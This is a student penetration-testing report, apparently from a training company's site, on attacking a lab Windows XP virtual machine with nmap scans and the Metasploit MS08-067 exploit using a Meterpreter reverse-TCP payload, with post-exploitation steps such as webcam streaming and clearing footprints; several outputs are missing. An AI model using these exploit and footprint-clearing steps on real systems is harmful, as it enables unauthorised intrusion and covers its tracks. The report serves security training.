Vulnerability Assessment & Penetration Testing Report on Windows XP

Vulnerability Assessment & Penetration Testing Report


Windows XP

vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.


Vulnerability  Assessment & Penetration Testing on Windows XP project done by ICSS Student Prashant Kumar. Here discussed the full process below.


Project NameVulnerability  Assessment & Penetration Testing on Windows XP

Author NamePrashant Kumar

Publish Date:  24-07-2018



Vulnerability Assessment and Penetration Testing (VAPT) is a Systematic analysis of security status of Information systems. Vulnerability assessment is an on-demand solution which makes it convenient to run tests over the Internet anywhere, anytime. It is a hybrid solution which blends automated testing with security expert analysis. The unique technology identifies all possible attack vectors. Vulnerability assessment offers partial evaluation of vulnerabilities, actually testing for vulnerabilities done by penetrating barriers is useful adjunct. As it identifies potential access paths missed by VAS. Penetration testing aka “pen testing” is the practice of testing a computer system, network or Web application to find vulnerabilities that an attacker could exploit.

Vulnerability Assessment & Pen tests can be automated with software applications or they can be performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting back the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents done by Pen testers aka “Red Team”.


Vulnerability Assessment



Life cycle of penetration testing:


Life cycle of penetration testing



Reconnaissance denotes the work of information gathering before any real attacks are planned. The idea is to collect as much interesting information as possible about the target. Reconnaissance is probably the longest phase, sometimes lasting weeks or months. But here we have a known target, a windows xp machine connected to same network as on find the target machine we will run an Nmap scan.

After Nmap scan the live hosts are-




Now we need the os details of every system connected to the network so that we can find our target machine. So first we need to separate out the live ip address so we will save the above result in a text file and then filter the ip address using the command –


nmap -sV -sP > livehosts.txt


cat host.txt | grep “for” | cut -d “ “ -f5 > ip.txt


The output is:


windows xp


Now we have to check which one of them is a windows xp machine so we will run an script which will detect the os of all the live ip’s.

nmap -sV -O -iL ip.txt > osdetails.txt


And the output is:


Starting Nmap 7.60 ( ) at 2018-07-23 02:06 IST Nmap scan report for XiaoQiang ( Host is up (0.014s latency).

Not shown: 995 closed ports


53/tcp open domain dnsmasq 2.71
80/tcp open http nginx
8192/tcp open http Tengine httpd
8193/tcp open http nginx



8899/tcp open http    Tengine httpd


MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)


No exact OS matches for host (If you know what OS is running on it, see ).


TCP/IP fingerprint:


OS:SCAN(V=7.60%E=4%D=7/23%OT=53%CT=1%CU=41503%PV=Y%DS=1 %DC=D%G=Y%M=7811DC%T






OS:=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6= M5B4ST11)WIN(W1=3890%W2=3


OS:890%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T =40%W=3908%O=M5B4NNSNW


OS:7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%F=AS%RD=0%Q=)T2 (R=N)T3(R=N)T4(R=Y%DF


OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=4 0%W=0%S=Z%A=S+%F=AR%O=


OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 %Q=)T7(R=N)U1(R=Y%DF=N%







Network Distance: 1 hop


Nmap scan report for


Host is up (0.016s latency).


Not shown: 999 closed ports




62078/tcp open tcpwrapped


MAC Address: 88:19:08:C9:D6:A8 (Unknown)


No exact OS matches for host (If you know what OS is running on it, see ).


TCP/IP fingerprint:


OS:SCAN(V=7.60%E=4%D=7/23%OT=62078%CT=1%CU=31349%PV=Y% DS=1%DC=D%G=Y%M=88190










OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4( R=Y%DF=Y%T=40%W=0%S


OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A= S+%F=AR%O=%RD=0%Q=)T6(R


OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF= N%T=40%W=0%S=Z%A=S%F=A






Network Distance: 1 hop

Nmap scan report for

Host is up (0.00062s latency).

Not shown: 996 closed ports




135/tcp open msrpc                Microsoft Windows RPC


139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds


2869/tcp open http                Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)


MAC Address: 00:0C:29:BE:B1:2B (VMware)


Device type: general purpose


Running: Microsoft Windows XP|2003


OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003


OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003


Network Distance: 1 hop


Service Info: OSs: Windows, Windows XP; CPE:


cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp


Nmap scan report for


Host is up (0.000017s latency).


Not shown: 999 closed ports




22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)


Device type: general purpose


Running: Linux 3.X|4.X


OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4


OS details: Linux 3.10 – 4.1


Network Distance: 0 hops


Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


OS and Service detection performed. Please report any incorrect results at .


Nmap done: 6 IP addresses (4 hosts up) scanned in 261.30 seconds.


After analyzing the machine details the machine details in green font is our target machine. Now as we have identified our target we will move to next part.



Vulnerability scanning


In this part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerability in the system.


nmap -Pn –script vuln > vuln.txt


The output is :




The above picture shows the list of vulnerabilities and they are as follows:


|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED


This vulnerability exist but it doesn’t provide any user access so it can’t be used. The next one is,




This vulnerability allows user to have remote access to the target system and it exist on windows xp 2003 machine which is our target.


Then the last one listed is



This vulnerability also allows users to have remote access to the target system but it is not available for the windows xp 2003 machine it only exists in windows servers.


So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.



Attack & Penetration


Now as we know the vulnerability, we will search this in Metasploit framework database. Metasploit framework has a huge collection of exploits, payloads and modules which are used by the hacking community. So it can launched by typing msfconsole in the terminal.

Now we have search for the ms08_067 vulnerability. So we will type

search ms08_067




The description of this module is:




This module is used by following command.

use exploit/windows/smb/ms08_067_netapi

Now the following commands are used to see the payloads 0f this module and setting one of them as our requirement.

show payloads

We are going to use ‘windows/meterpreter/reverse_tcp’ payload.

set payload windows/meterpreter/reverse_tcp

show options

set rhost   (target ip address)

set lhost  (attacker ip address)


attacker ip address


Now to get a access session with the target machine exploit command is used.






Post exploitation


Once we get a meterpreter session we have the full access of the target machine. we can do anything we want like we can escalate privilege by the command-



To confirm check the ip by command-



The following picture shows that-



We can see the options by typing help. Some common commands are:





webcam_stream (If the target machine has a webcam)






When our task is completed. No longer need of the target machine we need to clear our footprints using command –





Conclusion & Recommendations


After reviewing the vulnerability and getting access of the system is a big security threat. Our data can be misused. So machine should be kept safe from such things.

This particular vulnerability was patched and released by the Microsoft a long ago so just perform a windows update and this vulnerability will automatically disappear.


Recommendations are:

  • Always keep the machine & its software updated.


  • Use a good antivirus.


  • We can use a custom firewall too.


  • Don’t install software from unknown source.






…………End of the report………..



Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Internet Of Things Training Hyderabad

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 


Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery


Other Location for Online Courses: